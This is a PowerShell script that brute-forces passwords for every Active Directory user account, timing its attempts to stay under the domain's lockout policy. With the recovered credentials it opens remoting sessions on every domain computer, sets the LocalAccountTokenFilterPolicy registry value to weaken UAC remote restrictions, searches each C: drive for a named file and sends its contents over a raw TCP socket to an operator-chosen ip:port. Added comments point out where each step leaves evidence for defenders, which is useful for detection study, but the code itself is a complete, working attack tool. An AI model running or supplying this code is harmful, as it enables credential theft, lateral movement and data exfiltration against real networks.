# Script-scoped holder for the password most recently accepted by BruteForceUser.
# It is handed to that function as a [REF] out-parameter and read back by the caller
# after each user; the function itself resets .Value to "" before it starts guessing.
# (Reviewer note: this listing is a domain credential-guessing, lateral-movement and
# file-exfiltration script as pasted; the comments throughout describe what each step
# does and where it leaves evidence for defenders.)
$global:global_password = $null
  2.  
function BruteForceUser {
    # Tries each entry of $passwords as the bind password for $username against the
    # current domain (a DirectoryEntry bind to the domain root). Every iteration is a real
    # authentication against a domain controller, so each attempt normally leaves a
    # failed- or successful-logon record there; that audit trail, and the burst of
    # failures per account, is the primary detection point for this routine.
    #
    # Parameters:
    #   $passwords               - candidate passwords, one per element
    #   $username                - account name to test
    #   $lockoutThreshold        - the domain's LockoutThreshold; attempts made before pausing
    #   $lockoutObsWindowSeconds - the domain's observation window in seconds; basis of the pause
    #   $LogFile                 - if set, a found credential is appended here in clear text
    #   $global_password         - [REF] out-parameter; .Value receives the accepted password
    # Returns: 1 if some password was accepted, 0 otherwise. Progress is written to the
    # output stream throughout, including every password tried.
    param ( [string []] $passwords, [string] $username, [int32] $lockoutThreshold, [double] $lockoutObsWindowSeconds, [string] $LogFile, [REF]$global_password)

    $attemps = 0
    # Clear the out-parameter so the caller can distinguish "not found" from a stale value.
    $global_password.Value = ""

    Write-Output "----------------------------------------------------------------------"
    Write-Output "[*] Brute Forcing passwords for username: '$username'"

    foreach ($password in $passwords) {
        Write-Output "Trying password $password"

        # Lockout-aware pacing: when the counter reaches the domain threshold, sleep for the
        # observation window plus a margin (apparently intended to let the DC's bad-password
        # count reset) and start counting again. A repeating pattern of "a fixed number of
        # failures, then silence" per account is itself a recognisable signature.
        if($attempts -eq $lockoutThreshold) {

            Write-Output "Hit threshold limit...sleeping"
            $lockoutObsWindowSeconds = $lockoutObsWindowSeconds + 3
            Start-Sleep $lockoutObsWindowSeconds
            $attempts = 0
            Write-Output "Reattempting to brute force"
        }

        # Bind to the domain root as $username/$password; reading .name forces the bind.
        # The script treats an empty .name as a failed bind.
        $dom = New-Object System.DirectoryServices.DirectoryEntry("LDAP://$(([adsi]'').distinguishedName)",$username,$password)
        $res = $dom.name

        if($res -eq $null) {
            Write-Output "Password '$password' was wrong"
            $attempts = $attempts + 1
        }

        else {
            Write-Output "Password '$password' was right!!!"

            # The recovered credential is persisted in plain text: to $LogFile if given,
            # otherwise to the output stream. Either location is evidence worth collecting.
            if($LogFile) {
                Add-Content $LogFile "$username has this password: $password"
            }

            else {
                Write-Output "'$username' has this password: '$password'"
            }

            $global_password.Value = $password
            return 1
        }
    }

    Write-Output "Not able to brute force password for'$username'"
    return 0
}
  52.  
  53.  
function BeginImpant {
    # Orchestrates the whole run: enumerates every domain user, guesses passwords for each
    # with BruteForceUser, then for every domain computer and every recovered credential
    # opens a PowerShell Remoting session, creates/sets the LocalAccountTokenFilterPolicy
    # registry entry, searches the C: drive for $FileName and streams the file's contents
    # over a plain TCP socket to $Target. Each stage leaves distinct evidence (noted inline).
    #
    # Parameters:
    #   $PassList - path to a file with one candidate password per line
    #   $FileName - name/pattern passed to Get-ChildItem -Filter on each host
    #   $Target   - "ip:port" of the listener that receives file contents
    #   $LogFile  - optional path; forwarded to BruteForceUser
    # Requires the ActiveDirectory module on the running host and WinRM on the targets.
    param( [string] $PassList, [string] $FileName, $Target, [string] $LogFile)

    Import-Module activedirectory

    $domain = (Get-ADDomain -Current LoggedOnUser).distinguishedName

    $ip = $Target.split(":")[0]
    $port = [int] $Target.split(":")[1]

    # The outbound connection is opened up front, before any guessing starts. A domain-joined
    # host opening a new TCP connection to an arbitrary ip:port and then immediately
    # enumerating AD (below) is a useful correlation point for network and endpoint telemetry.
    $socket = New-Object Net.Sockets.TcpClient($ip,$port) -ErrorAction Stop
    $tcpStream = $socket.GetStream()
    $writer = New-Object System.IO.StreamWriter($tcpStream)
    $writer.AutoFlush = $true

    # Full enumeration of every user account in the domain: a large LDAP query that
    # ordinary workstation activity rarely produces.
    $userAccounts = Get-ADUser -Filter * -SearchBase $domain | Select-Object -ExpandProperty SamAccountName
    [string []] $passwordList = Get-Content -Path $PassList

    # The domain's own lockout policy is read so the guessing loop can pace itself around
    # it; a low threshold with a long observation window slows this but does not stop it,
    # so monitoring for the resulting failure pattern matters more than the policy alone.
    $accountInfo = Get-ADDefaultDomainPasswordPolicy | Select LockoutThreshold, LockoutObservationWindow

    $lockoutThreshold = $accountInfo.LockoutThreshold
    $lockoutObsWindow = $accountInfo.LockoutObservationWindow.TotalSeconds

    $successfulAccounts = @()

    foreach ($userName in $userAccounts) {
        Write-Output "[*] Processing username: '$userName'"

        # The result is read back through the [REF] out-parameter, not the return value.
        BruteForceUser $passwordList $userName $lockoutThreshold $lockoutObsWindow $LogFile ([REF]$global:global_password)

        if($global_password -eq "") {Write-Output "Password not found"}
        else {
            $res = "" | Select-Object username,password
            $res.username = $userName
            $res.password = $global_password
            $successfulAccounts += $res
        }
    }

    # Recovered credentials are echoed to the console in clear text; with PowerShell
    # transcription or script block logging enabled they also land in the event log.
    Write-Host $successfulAccounts

    # Every computer object in the domain becomes a lateral-movement target.
    $computers = Get-ADComputer -Filter * | Select -ExpandProperty name

    Write-Host $computers

    foreach($computer in $computers) {

        foreach($userInfo in $successfulAccounts) {

            $secstr = New-Object -TypeName System.Security.SecureString
            $userInfo.password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)}
            $cred = New-Object -typename System.Management.Automation.PSCredential $userInfo.username,$secstr
            $uname = $userInfo.username

            try {
                # WinRM / PowerShell Remoting logon on the target with the guessed account.
                # On $computer this appears as a network logon plus entries in the WinRM and
                # PowerShell operational logs; -ErrorAction SilentlyContinue hides a failed
                # connection at this point.
                $s = New-PSSession -ComputerName $computer -Credential $cred -ErrorAction SilentlyContinue

                # LocalAccountTokenFilterPolicy governs UAC remote restrictions for local
                # accounts. The script creates the entry if missing and writes "1" (below),
                # a persistent weakening of the host. Changes under
                # HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System are worth
                # alerting on, and enforcing the value via Group Policy reverts the change.
                $checkKeyExists = Invoke-Command -Session $s -Scriptblock {Test-Path HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy -ErrorAction SilentlyContinue}

                if($checkKeyExists -eq $false) {
                    Write-Host "Creating registry key on $computer"
                    Invoke-Command -Session $s -Scriptblock {New-Item -Path HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LocalAccountTokenFilterPolicy -ErrorAction SilentlyContinue -Force}
                }

                Write-Host "Setting value of key to 1 in $computer"
                Invoke-Command -Session $s -Scriptblock {Set-Item -Path HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy -Value "1" -ErrorAction SilentlyContinue}

                # Recursive walk of the whole C: drive (hidden items included via -Force)
                # looking for $FileName: slow, and very noisy under file-access auditing.
                $res = Invoke-Command -Session $s -Scriptblock {param($fname) Get-ChildItem -Path C:\ -Recurse -Filter $fname -ErrorAction SilentlyContinue -Force} -ArgumentList $FileName

                if ($res -eq $null) {
                    Write-Output "File not found in user $uname in computer $computer"
                }

                else {
                    # Reads the matched file inside the remote session and sends its full text
                    # over the unencrypted socket opened above: the exfiltration step.
                    $filePath = $res.FullName
                    $fileContent = Invoke-Command -Session $s -Scriptblock {param($fpath) [IO.File]::ReadAllText($fpath)} -ArgumentList $filePath

                    Write-Host "File found...: $fileContent"

                    Write-Host "Sending file to server"
                    $writer.WriteLine($fileContent)
                }
                Remove-PSSession $s
            }

            catch {
                Write-Output "Some error occured in computer $computer with user $uname"
            }
        }
    }
}